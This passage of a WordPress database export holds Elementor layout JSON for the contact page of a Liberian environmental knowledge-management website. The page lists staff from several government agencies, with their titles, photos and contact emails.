href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24639,3643,'_elementor_edit_mode','builder'),(24640,3643,'_elementor_template_type','wp-page'),(24641,3643,'_elementor_version','3.0.16'),(24642,3643,'_wp_page_template','default'),(24643,3643,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a 